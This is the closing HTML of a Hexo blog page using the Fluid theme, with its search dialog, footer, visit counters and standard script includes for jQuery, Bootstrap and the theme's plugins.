      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/Romanc9" target="_blank" rel="nofollow noopener"><span>Luoman</span></a> <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- LeanCloud 统计PV -->
        <span id="leancloud-site-pv-container" style="display: none">
            总访问量 
            <span id="leancloud-site-pv"></span>
             次
          </span>
      
      
        <!-- LeanCloud 统计UV -->
        <span id="leancloud-site-uv-container" style="display: none">
            总访客数 
            <span id="leancloud-site-uv"></span>
             人
          </span>
      

    
  </div>


  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>



  <script defer src="/js/leancloud.js" ></script>



  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>












  

  

  

  

  

  





<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
